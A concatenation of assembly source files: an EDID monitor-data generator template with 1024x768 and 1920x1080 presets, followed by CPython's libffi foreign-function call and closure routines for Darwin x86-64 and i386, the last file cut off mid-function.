#define WEEK 5
/* EDID 1.3 standard definitions */
#define XY_RATIO_16_10 0b00
#define XY_RATIO_4_3 0b01
#define XY_RATIO_5_4 0b10
#define XY_RATIO_16_9 0b11
/* Provide defaults for the timing bits */
#ifndef ESTABLISHED_TIMING1_BITS
#define ESTABLISHED_TIMING1_BITS 0x00
#endif
#ifndef ESTABLISHED_TIMING2_BITS
#define ESTABLISHED_TIMING2_BITS 0x00
#endif
#ifndef ESTABLISHED_TIMING3_BITS
#define ESTABLISHED_TIMING3_BITS 0x00
#endif
#define mfgname2id(v1,v2,v3) \
((((v1-'@')&0x1f)<<10)+(((v2-'@')&0x1f)<<5)+((v3-'@')&0x1f))
#define swap16(v1) ((v1>>8)+((v1&0xff)<<8))
#define msbs2(v1,v2) ((((v1>>8)&0x0f)<<4)+((v2>>8)&0x0f))
#define msbs4(v1,v2,v3,v4) \
(((v1&0x03)>>2)+((v2&0x03)>>4)+((v3&0x03)>>6)+((v4&0x03)>>8))
#define pixdpi2mm(pix,dpi) ((pix*25)/dpi)
#define xsize pixdpi2mm(XPIX,DPI)
#define ysize pixdpi2mm(YPIX,DPI)
.data
/* Fixed header pattern */
header: .byte 0x00,0xff,0xff,0xff,0xff,0xff,0xff,0x00
mfg_id: .hword swap16(mfgname2id(MFG_LNX1, MFG_LNX2, MFG_LNX3))
prod_code: .hword 0
/* Serial number. 32 bits, little endian. */
serial_number: .long SERIAL
/* Week of manufacture */
week: .byte WEEK
/* Year of manufacture, less 1990. (1990-2245)
If week=255, it is the model year instead */
year: .byte YEAR-1990
version: .byte VERSION /* EDID version, usually 1 (for 1.3) */
revision: .byte REVISION /* EDID revision, usually 3 (for 1.3) */
/* If Bit 7=1 Digital input. If set, the following bit definitions apply:
Bits 6-1 Reserved, must be 0
Bit 0 Signal is compatible with VESA DFP 1.x TMDS CRGB,
1 pixel per clock, up to 8 bits per color, MSB aligned,
If Bit 7=0 Analog input. If clear, the following bit definitions apply:
Bits 6-5 Video white and sync levels, relative to blank
00=+0.7/-0.3 V; 01=+0.714/-0.286 V;
10=+1.0/-0.4 V; 11=+0.7/0 V
Bit 4 Blank-to-black setup (pedestal) expected
Bit 3 Separate sync supported
Bit 2 Composite sync (on HSync) supported
Bit 1 Sync on green supported
Bit 0 VSync pulse must be serrated when somposite or
sync-on-green is used. */
video_parms: .byte 0x6d
/* Maximum horizontal image size, in centimetres
(max 292 cm/115 in at 16:9 aspect ratio) */
max_hor_size: .byte xsize/10
/* Maximum vertical image size, in centimetres.
If either byte is 0, undefined (e.g. projector) */
max_vert_size: .byte ysize/10
/* Display gamma, minus 1, times 100 (range 1.00-3.5 */
gamma: .byte 120
/* Bit 7 DPMS standby supported
Bit 6 DPMS suspend supported
Bit 5 DPMS active-off supported
Bits 4-3 Display type: 00=monochrome; 01=RGB colour;
10=non-RGB multicolour; 11=undefined
Bit 2 Standard sRGB colour space. Bytes 25-34 must contain
sRGB standard values.
Bit 1 Preferred timing mode specified in descriptor block 1.
Bit 0 GTF supported with default parameter values. */
dsp_features: .byte 0xea
/* Chromaticity coordinates. */
/* Red and green least-significant bits
Bits 7-6 Red x value least-significant 2 bits
Bits 5-4 Red y value least-significant 2 bits
Bits 3-2 Green x value lst-significant 2 bits
Bits 1-0 Green y value least-significant 2 bits */
red_green_lsb: .byte 0x5e
/* Blue and white least-significant 2 bits */
blue_white_lsb: .byte 0xc0
/* Red x value most significant 8 bits.
0-255 encodes 0-0.996 (255/256); 0-0.999 (1023/1024) with lsbits */
red_x_msb: .byte 0xa4
/* Red y value most significant 8 bits */
red_y_msb: .byte 0x59
/* Green x and y value most significant 8 bits */
green_x_y_msb: .byte 0x4a,0x98
/* Blue x and y value most significant 8 bits */
blue_x_y_msb: .byte 0x25,0x20
/* Default white point x and y value most significant 8 bits */
white_x_y_msb: .byte 0x50,0x54
/* Established timings */
/* Bit 7 720x400 @ 70 Hz
Bit 6 720x400 @ 88 Hz
Bit 5 640x480 @ 60 Hz
Bit 4 640x480 @ 67 Hz
Bit 3 640x480 @ 72 Hz
Bit 2 640x480 @ 75 Hz
Bit 1 800x600 @ 56 Hz
Bit 0 800x600 @ 60 Hz */
estbl_timing1: .byte ESTABLISHED_TIMING1_BITS
/* Bit 7 800x600 @ 72 Hz
Bit 6 800x600 @ 75 Hz
Bit 5 832x624 @ 75 Hz
Bit 4 1024x768 @ 87 Hz, interlaced (1024x768)
Bit 3 1024x768 @ 60 Hz
Bit 2 1024x768 @ 72 Hz
Bit 1 1024x768 @ 75 Hz
Bit 0 1280x1024 @ 75 Hz */
estbl_timing2: .byte ESTABLISHED_TIMING2_BITS
/* Bit 7 1152x870 @ 75 Hz (Apple Macintosh II)
Bits 6-0 Other manufacturer-specific display mod */
estbl_timing3: .byte ESTABLISHED_TIMING3_BITS
/* Standard timing */
/* X resolution, less 31, divided by 8 (256-2288 pixels) */
std_xres: .byte (XPIX/8)-31
/* Y resolution, X:Y pixel ratio
Bits 7-6 X:Y pixel ratio: 00=16:10; 01=4:3; 10=5:4; 11=16:9.
Bits 5-0 Vertical frequency, less 60 (60-123 Hz) */
std_vres: .byte (XY_RATIO<<6)+VFREQ-60
.fill 7,2,0x0101 /* Unused */
descriptor1:
/* Pixel clock in 10 kHz units. (0.-655.35 MHz, little-endian) */
clock: .hword CLOCK/10
/* Horizontal active pixels 8 lsbits (0-4095) */
x_act_lsb: .byte XPIX&0xff
/* Horizontal blanking pixels 8 lsbits (0-4095)
End of active to start of next active. */
x_blk_lsb: .byte XBLANK&0xff
/* Bits 7-4 Horizontal active pixels 4 msbits
Bits 3-0 Horizontal blanking pixels 4 msbits */
x_msbs: .byte msbs2(XPIX,XBLANK)
/* Vertical active lines 8 lsbits (0-4095) */
y_act_lsb: .byte YPIX&0xff
/* Vertical blanking lines 8 lsbits (0-4095) */
y_blk_lsb: .byte YBLANK&0xff
/* Bits 7-4 Vertical active lines 4 msbits
Bits 3-0 Vertical blanking lines 4 msbits */
y_msbs: .byte msbs2(YPIX,YBLANK)
/* Horizontal sync offset pixels 8 lsbits (0-1023) From blanking start */
x_snc_off_lsb: .byte XOFFSET&0xff
/* Horizontal sync pulse width pixels 8 lsbits (0-1023) */
x_snc_pls_lsb: .byte XPULSE&0xff
/* Bits 7-4 Vertical sync offset lines 4 lsbits -63)
Bits 3-0 Vertical sync pulse width lines 4 lsbits -63) */
y_snc_lsb: .byte ((YOFFSET-63)<<4)+(YPULSE-63)
/* Bits 7-6 Horizontal sync offset pixels 2 msbits
Bits 5-4 Horizontal sync pulse width pixels 2 msbits
Bits 3-2 Vertical sync offset lines 2 msbits
Bits 1-0 Vertical sync pulse width lines 2 msbits */
xy_snc_msbs: .byte msbs4(XOFFSET,XPULSE,YOFFSET,YPULSE)
/* Horizontal display size, mm, 8 lsbits (0-4095 mm, 161 in) */
x_dsp_size: .byte xsize&0xff
/* Vertical display size, mm, 8 lsbits (0-4095 mm, 161 in) */
y_dsp_size: .byte ysize&0xff
/* Bits 7-4 Horizontal display size, mm, 4 msbits
Bits 3-0 Vertical display size, mm, 4 msbits */
dsp_size_mbsb: .byte msbs2(xsize,ysize)
/* Horizontal border pixels (each side; total is twice this) */
x_border: .byte 0
/* Vertical border lines (each side; total is twice this) */
y_border: .byte 0
/* Bit 7 Interlaced
Bits 6-5 Stereo mode: 00=No stereo; other values depend on bit 0:
Bit 0=0: 01=Field sequential, sync=1 during right; 10=similar,
sync=1 during left; 11=4-way interleaved stereo
Bit 0=1 2-way interleaved stereo: 01=Right image on even lines;
10=Left image on even lines; 11=side-by-side
Bits 4-3 Sync type: 00=Analog composite; 01=Bipolar analog composite;
10=Digital composite (on HSync); 11=Digital separate
Bit 2 If digital separate: Vertical sync polarity (1=positive)
Other types: VSync serrated (HSync during VSync)
Bit 1 If analog sync: Sync on all 3 RGB lines (else green only)
Digital: HSync polarity (1=positive)
Bit 0 2-way line-interleaved stereo, if bits 4-3 are not 00. */
features: .byte 0x18+(VSYNC_POL<<2)+(HSYNC_POL<<1)
descriptor2: .byte 0,0 /* Not a detailed timing descriptor */
.byte 0 /* Must be zero */
.byte 0xff /* Descriptor is monitor serial number (text) */
.byte 0 /* Must be zero */
start1: .ascii "Linux #0"
end1: .byte 0x0a /* End marker */
.fill 12-(end1-start1), 1, 0x20 /* Padded spaces */
descriptor3: .byte 0,0 /* Not a detailed timing descriptor */
.byte 0 /* Must be zero */
.byte 0xfd /* Descriptor is monitor range limits */
.byte 0 /* Must be zero */
start2: .byte VFREQ-1 /* Minimum vertical field rate (1-255 Hz) */
.byte VFREQ+1 /* Maximum vertical field rate (1-255 Hz) */
.byte (CLOCK/(XPIX+XBLANK))-1 /* Minimum horizontal line rate
(1-255 kHz) */
.byte (CLOCK/(XPIX+XBLANK))+1 /* Maximum horizontal line rate
(1-255 kHz) */
.byte (CLOCK/10000)+1 /* Maximum pixel clock rate, rounded up
to 10 MHz multiple (10-2550 MHz) */
.byte 0 /* No extended timing information type */
end2: .byte 0x0a /* End marker */
.fill 12-(end2-start2), 1, 0x20 /* Padded spaces */
descriptor4: .byte 0,0 /* Not a detailed timing descriptor */
.byte 0 /* Must be zero */
.byte 0xfc /* Descriptor is text */
.byte 0 /* Must be zero */
start3: .ascii TIMING_NAME
end3: .byte 0x0a /* End marker */
.fill 12-(end3-start3), 1, 0x20 /* Padded spaces */
extensions: .byte 0 /* Number of extensions to follow */
checksum: .byte CRC /* Sum of all bytes must be 0 */
|
akatrevorjay/edid-generator
| 1,317
|
1024x768.S
|
/*
1024x768.S: EDID data set for standard 1024x768 60 Hz monitor
Copyright (C) 2011 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 65000 /* kHz */
#define XPIX 1024
#define YPIX 768
#define XY_RATIO XY_RATIO_4_3
#define XBLANK 320
#define YBLANK 38
#define XOFFSET 8
#define XPULSE 144
#define YOFFSET (63+3)
#define YPULSE (63+6)
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux XGA"
#define ESTABLISHED_TIMING2_BITS 0x08 /* Bit 3 -> 1024x768 @60 Hz */
#define HSYNC_POL 0
#define VSYNC_POL 0
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,287
|
1920x1080.S
|
/*
1920x1080.S: EDID data set for standard 1920x1080 60 Hz monitor
Copyright (C) 2012 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 148500 /* kHz */
#define XPIX 1920
#define YPIX 1080
#define XY_RATIO XY_RATIO_16_9
#define XBLANK 280
#define YBLANK 45
#define XOFFSET 88
#define XPULSE 44
#define YOFFSET (63+4)
#define YPULSE (63+5)
#define DPI 96
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux FHD"
/* No ESTABLISHED_TIMINGx_BITS */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akheron/cpython
| 11,660
|
Modules/_ctypes/libffi_osx/x86/darwin64.S
|
/* -----------------------------------------------------------------------
darwin64.S - Copyright (c) 2006 Free Software Foundation, Inc.
derived from unix64.S
x86-64 Foreign Function Interface for Darwin.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#ifdef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
.file "darwin64.S"
.text
/* ffi_call_unix64 (void *args, unsigned long bytes, unsigned flags,
void *raddr, void (*fnaddr)());
Bit o trickiness here -- ARGS+BYTES is the base of the stack frame
for this function. This has been allocated by ffi_call. We also
deallocate some of the stack that has been alloca'd. */
.align 3
.globl _ffi_call_unix64
_ffi_call_unix64:
LUW0:
movq (%rsp), %r10 /* Load return address. */
movq %rdi, %r12 /* Save a copy of the register area. */
leaq (%rdi, %rsi), %rax /* Find local stack base. */
movq %rdx, (%rax) /* Save flags. */
movq %rcx, 8(%rax) /* Save raddr. */
movq %rbp, 16(%rax) /* Save old frame pointer. */
movq %r10, 24(%rax) /* Relocate return address. */
movq %rax, %rbp /* Finalize local stack frame. */
LUW1:
/* movq %rdi, %r10 // Save a copy of the register area. */
movq %r12, %r10
movq %r8, %r11 /* Save a copy of the target fn. */
movl %r9d, %eax /* Set number of SSE registers. */
/* Load up all argument registers. */
movq (%r10), %rdi
movq 8(%r10), %rsi
movq 16(%r10), %rdx
movq 24(%r10), %rcx
movq 32(%r10), %r8
movq 40(%r10), %r9
testl %eax, %eax
jnz Lload_sse
Lret_from_load_sse:
/* Deallocate the reg arg area. */
leaq 176(%r10), %rsp
/* Call the user function. */
call *%r11
/* Deallocate stack arg area; local stack frame in redzone. */
leaq 24(%rbp), %rsp
movq 0(%rbp), %rcx /* Reload flags. */
movq 8(%rbp), %rdi /* Reload raddr. */
movq 16(%rbp), %rbp /* Reload old frame pointer. */
LUW2:
/* The first byte of the flags contains the FFI_TYPE. */
movzbl %cl, %r10d
leaq Lstore_table(%rip), %r11
movslq (%r11, %r10, 4), %r10
addq %r11, %r10
jmp *%r10
Lstore_table:
.long Lst_void-Lstore_table /* FFI_TYPE_VOID */
.long Lst_sint32-Lstore_table /* FFI_TYPE_INT */
.long Lst_float-Lstore_table /* FFI_TYPE_FLOAT */
.long Lst_double-Lstore_table /* FFI_TYPE_DOUBLE */
.long Lst_ldouble-Lstore_table /* FFI_TYPE_LONGDOUBLE */
.long Lst_uint8-Lstore_table /* FFI_TYPE_UINT8 */
.long Lst_sint8-Lstore_table /* FFI_TYPE_SINT8 */
.long Lst_uint16-Lstore_table /* FFI_TYPE_UINT16 */
.long Lst_sint16-Lstore_table /* FFI_TYPE_SINT16 */
.long Lst_uint32-Lstore_table /* FFI_TYPE_UINT32 */
.long Lst_sint32-Lstore_table /* FFI_TYPE_SINT32 */
.long Lst_int64-Lstore_table /* FFI_TYPE_UINT64 */
.long Lst_int64-Lstore_table /* FFI_TYPE_SINT64 */
.long Lst_struct-Lstore_table /* FFI_TYPE_STRUCT */
.long Lst_int64-Lstore_table /* FFI_TYPE_POINTER */
.text
.align 3
Lst_void:
ret
.align 3
Lst_uint8:
movzbq %al, %rax
movq %rax, (%rdi)
ret
.align 3
Lst_sint8:
movsbq %al, %rax
movq %rax, (%rdi)
ret
.align 3
Lst_uint16:
movzwq %ax, %rax
movq %rax, (%rdi)
.align 3
Lst_sint16:
movswq %ax, %rax
movq %rax, (%rdi)
ret
.align 3
Lst_uint32:
movl %eax, %eax
movq %rax, (%rdi)
.align 3
Lst_sint32:
cltq
movq %rax, (%rdi)
ret
.align 3
Lst_int64:
movq %rax, (%rdi)
ret
.align 3
Lst_float:
movss %xmm0, (%rdi)
ret
.align 3
Lst_double:
movsd %xmm0, (%rdi)
ret
Lst_ldouble:
fstpt (%rdi)
ret
.align 3
Lst_struct:
leaq -20(%rsp), %rsi /* Scratch area in redzone. */
/* We have to locate the values now, and since we don't want to
write too much data into the user's return value, we spill the
value to a 16 byte scratch area first. Bits 8, 9, and 10
control where the values are located. Only one of the three
bits will be set; see ffi_prep_cif_machdep for the pattern. */
movd %xmm0, %r10
movd %xmm1, %r11
testl $0x100, %ecx
cmovnz %rax, %rdx
cmovnz %r10, %rax
testl $0x200, %ecx
cmovnz %r10, %rdx
testl $0x400, %ecx
cmovnz %r10, %rax
cmovnz %r11, %rdx
movq %rax, (%rsi)
movq %rdx, 8(%rsi)
/* Bits 12-31 contain the true size of the structure. Copy from
the scratch area to the true destination. */
shrl $12, %ecx
rep movsb
ret
/* Many times we can avoid loading any SSE registers at all.
It's not worth an indirect jump to load the exact set of
SSE registers needed; zero or all is a good compromise. */
.align 3
LUW3:
Lload_sse:
movdqa 48(%r10), %xmm0
movdqa 64(%r10), %xmm1
movdqa 80(%r10), %xmm2
movdqa 96(%r10), %xmm3
movdqa 112(%r10), %xmm4
movdqa 128(%r10), %xmm5
movdqa 144(%r10), %xmm6
movdqa 160(%r10), %xmm7
jmp Lret_from_load_sse
LUW4:
.align 3
.globl _ffi_closure_unix64
_ffi_closure_unix64:
LUW5:
/* The carry flag is set by the trampoline iff SSE registers
are used. Don't clobber it before the branch instruction. */
leaq -200(%rsp), %rsp
LUW6:
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %rcx, 24(%rsp)
movq %r8, 32(%rsp)
movq %r9, 40(%rsp)
jc Lsave_sse
Lret_from_save_sse:
movq %r10, %rdi
leaq 176(%rsp), %rsi
movq %rsp, %rdx
leaq 208(%rsp), %rcx
call _ffi_closure_unix64_inner
/* Deallocate stack frame early; return value is now in redzone. */
addq $200, %rsp
LUW7:
/* The first byte of the return value contains the FFI_TYPE. */
movzbl %al, %r10d
leaq Lload_table(%rip), %r11
movslq (%r11, %r10, 4), %r10
addq %r11, %r10
jmp *%r10
Lload_table:
.long Lld_void-Lload_table /* FFI_TYPE_VOID */
.long Lld_int32-Lload_table /* FFI_TYPE_INT */
.long Lld_float-Lload_table /* FFI_TYPE_FLOAT */
.long Lld_double-Lload_table /* FFI_TYPE_DOUBLE */
.long Lld_ldouble-Lload_table /* FFI_TYPE_LONGDOUBLE */
.long Lld_int8-Lload_table /* FFI_TYPE_UINT8 */
.long Lld_int8-Lload_table /* FFI_TYPE_SINT8 */
.long Lld_int16-Lload_table /* FFI_TYPE_UINT16 */
.long Lld_int16-Lload_table /* FFI_TYPE_SINT16 */
.long Lld_int32-Lload_table /* FFI_TYPE_UINT32 */
.long Lld_int32-Lload_table /* FFI_TYPE_SINT32 */
.long Lld_int64-Lload_table /* FFI_TYPE_UINT64 */
.long Lld_int64-Lload_table /* FFI_TYPE_SINT64 */
.long Lld_struct-Lload_table /* FFI_TYPE_STRUCT */
.long Lld_int64-Lload_table /* FFI_TYPE_POINTER */
.text
.align 3
Lld_void:
ret
.align 3
Lld_int8:
movzbl -24(%rsp), %eax
ret
.align 3
Lld_int16:
movzwl -24(%rsp), %eax
ret
.align 3
Lld_int32:
movl -24(%rsp), %eax
ret
.align 3
Lld_int64:
movq -24(%rsp), %rax
ret
.align 3
Lld_float:
movss -24(%rsp), %xmm0
ret
.align 3
Lld_double:
movsd -24(%rsp), %xmm0
ret
.align 3
Lld_ldouble:
fldt -24(%rsp)
ret
.align 3
Lld_struct:
/* There are four possibilities here, %rax/%rdx, %xmm0/%rax,
%rax/%xmm0, %xmm0/%xmm1. We collapse two by always loading
both rdx and xmm1 with the second word. For the remaining,
bit 8 set means xmm0 gets the second word, and bit 9 means
that rax gets the second word. */
movq -24(%rsp), %rcx
movq -16(%rsp), %rdx
movq -16(%rsp), %xmm1
testl $0x100, %eax
cmovnz %rdx, %rcx
movd %rcx, %xmm0
testl $0x200, %eax
movq -24(%rsp), %rax
cmovnz %rdx, %rax
ret
/* See the comment above Lload_sse; the same logic applies here. */
.align 3
LUW8:
Lsave_sse:
movdqa %xmm0, 48(%rsp)
movdqa %xmm1, 64(%rsp)
movdqa %xmm2, 80(%rsp)
movdqa %xmm3, 96(%rsp)
movdqa %xmm4, 112(%rsp)
movdqa %xmm5, 128(%rsp)
movdqa %xmm6, 144(%rsp)
movdqa %xmm7, 160(%rsp)
jmp Lret_from_save_sse
LUW9:
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1 /* CIE Length */
.long L$set$0
LSCIE1:
.long 0x0 /* CIE Identifier Tag */
.byte 0x1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 0x1 /* uleb128 0x1; CIE Code Alignment Factor */
.byte 0x78 /* sleb128 -8; CIE Data Alignment Factor */
.byte 0x10 /* CIE RA Column */
.byte 0x1 /* uleb128 0x1; Augmentation size */
.byte 0x10 /* FDE Encoding (pcrel sdata4) */
.byte 0xc /* DW_CFA_def_cfa, %rsp offset 8 */
.byte 0x7 /* uleb128 0x7 */
.byte 0x8 /* uleb128 0x8 */
.byte 0x90 /* DW_CFA_offset, column 0x10 */
.byte 0x1
.align 3
LECIE1:
.globl _ffi_call_unix64.eh
_ffi_call_unix64.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1 /* FDE Length */
.long L$set$1
LASFDE1:
.long LASFDE1-EH_frame1 /* FDE CIE offset */
.quad LUW0-. /* FDE initial location */
.set L$set$2,LUW4-LUW0 /* FDE address range */
.quad L$set$2
.byte 0x0 /* Augmentation size */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$3,LUW1-LUW0
.long L$set$3
/* New stack frame based off rbp. This is an itty bit of unwind
trickery in that the CFA *has* changed. There is no easy way
to describe it correctly on entry to the function. Fortunately,
it doesn't matter too much since at all points we can correctly
unwind back to ffi_call. Note that the location to which we
moved the return address is (the new) CFA-8, so from the
perspective of the unwind info, it hasn't moved. */
.byte 0xc /* DW_CFA_def_cfa, %rbp offset 32 */
.byte 0x6
.byte 0x20
.byte 0x80+6 /* DW_CFA_offset, %rbp offset 2*-8 */
.byte 0x2
.byte 0xa /* DW_CFA_remember_state */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$4,LUW2-LUW1
.long L$set$4
.byte 0xc /* DW_CFA_def_cfa, %rsp offset 8 */
.byte 0x7
.byte 0x8
.byte 0xc0+6 /* DW_CFA_restore, %rbp */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$5,LUW3-LUW2
.long L$set$5
.byte 0xb /* DW_CFA_restore_state */
.align 3
LEFDE1:
.globl _ffi_closure_unix64.eh
_ffi_closure_unix64.eh:
LSFDE3:
.set L$set$6,LEFDE3-LASFDE3 /* FDE Length */
.long L$set$6
LASFDE3:
.long LASFDE3-EH_frame1 /* FDE CIE offset */
.quad LUW5-. /* FDE initial location */
.set L$set$7,LUW9-LUW5 /* FDE address range */
.quad L$set$7
.byte 0x0 /* Augmentation size */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$8,LUW6-LUW5
.long L$set$8
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte 208,1 /* uleb128 208 */
.byte 0xa /* DW_CFA_remember_state */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$9,LUW7-LUW6
.long L$set$9
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte 0x8
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$10,LUW8-LUW7
.long L$set$10
.byte 0xb /* DW_CFA_restore_state */
.align 3
LEFDE3:
.subsections_via_symbols
#endif /* __x86_64__ */
|
akheron/cpython
| 8,955
|
Modules/_ctypes/libffi_osx/x86/x86-darwin.S
|
#ifdef __i386__
/* -----------------------------------------------------------------------
darwin.S - Copyright (c) 1996, 1998, 2001, 2002, 2003 Red Hat, Inc.
X86 Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL CYGNUS SOLUTIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
/*
* This file is based on sysv.S and then hacked up by Ronald who hasn't done
* assembly programming in 8 years.
*/
#ifndef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#ifdef PyObjC_STRICT_DEBUGGING
/* XXX: Debugging of stack alignment, to be removed */
#define ASSERT_STACK_ALIGNED movdqa -16(%esp), %xmm0
#else
#define ASSERT_STACK_ALIGNED
#endif
.text
.globl _ffi_prep_args
.align 4
.globl _ffi_call_SYSV
_ffi_call_SYSV:
LFB1:
pushl %ebp
LCFI0:
movl %esp,%ebp
LCFI1:
subl $8,%esp
/* Make room for all of the new args. */
movl 16(%ebp),%ecx
subl %ecx,%esp
movl %esp,%eax
/* Place all of the ffi_prep_args in position */
subl $8,%esp
pushl 12(%ebp)
pushl %eax
call *8(%ebp)
/* Return stack to previous state and call the function */
addl $16,%esp
call *28(%ebp)
/* Remove the space we pushed for the args */
movl 16(%ebp),%ecx
addl %ecx,%esp
/* Load %ecx with the return type code */
movl 20(%ebp),%ecx
/* If the return value pointer is NULL, assume no return value. */
cmpl $0,24(%ebp)
jne Lretint
/* Even if there is no space for the return value, we are
obliged to handle floating-point values. */
cmpl $FFI_TYPE_FLOAT,%ecx
jne Lnoretval
fstp %st(0)
jmp Lepilogue
Lretint:
cmpl $FFI_TYPE_INT,%ecx
jne Lretfloat
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movl %eax,0(%ecx)
jmp Lepilogue
Lretfloat:
cmpl $FFI_TYPE_FLOAT,%ecx
jne Lretdouble
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
fstps (%ecx)
jmp Lepilogue
Lretdouble:
cmpl $FFI_TYPE_DOUBLE,%ecx
jne Lretlongdouble
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
fstpl (%ecx)
jmp Lepilogue
Lretlongdouble:
cmpl $FFI_TYPE_LONGDOUBLE,%ecx
jne Lretint64
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
fstpt (%ecx)
jmp Lepilogue
Lretint64:
cmpl $FFI_TYPE_SINT64,%ecx
jne Lretstruct1b
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movl %eax,0(%ecx)
movl %edx,4(%ecx)
jmp Lepilogue
Lretstruct1b:
cmpl $FFI_TYPE_SINT8,%ecx
jne Lretstruct2b
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movb %al,0(%ecx)
jmp Lepilogue
Lretstruct2b:
cmpl $FFI_TYPE_SINT16,%ecx
jne Lretstruct
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movw %ax,0(%ecx)
jmp Lepilogue
Lretstruct:
cmpl $FFI_TYPE_STRUCT,%ecx
jne Lnoretval
/* Nothing to do! */
addl $4,%esp
popl %ebp
ret
Lnoretval:
Lepilogue:
addl $8,%esp
movl %ebp,%esp
popl %ebp
ret
LFE1:
.ffi_call_SYSV_end:
.align 4
FFI_HIDDEN (ffi_closure_SYSV)
.globl _ffi_closure_SYSV
_ffi_closure_SYSV:
LFB2:
pushl %ebp
LCFI2:
movl %esp, %ebp
LCFI3:
subl $56, %esp
leal -40(%ebp), %edx
movl %edx, -12(%ebp) /* resp */
leal 8(%ebp), %edx
movl %edx, 4(%esp) /* args = __builtin_dwarf_cfa () */
leal -12(%ebp), %edx
movl %edx, (%esp) /* &resp */
movl %ebx, 8(%esp)
LCFI7:
call L_ffi_closure_SYSV_inner$stub
movl 8(%esp), %ebx
movl -12(%ebp), %ecx
cmpl $FFI_TYPE_INT, %eax
je Lcls_retint
cmpl $FFI_TYPE_FLOAT, %eax
je Lcls_retfloat
cmpl $FFI_TYPE_DOUBLE, %eax
je Lcls_retdouble
cmpl $FFI_TYPE_LONGDOUBLE, %eax
je Lcls_retldouble
cmpl $FFI_TYPE_SINT64, %eax
je Lcls_retllong
cmpl $FFI_TYPE_UINT8, %eax
je Lcls_retstruct1
cmpl $FFI_TYPE_SINT8, %eax
je Lcls_retstruct1
cmpl $FFI_TYPE_UINT16, %eax
je Lcls_retstruct2
cmpl $FFI_TYPE_SINT16, %eax
je Lcls_retstruct2
cmpl $FFI_TYPE_STRUCT, %eax
je Lcls_retstruct
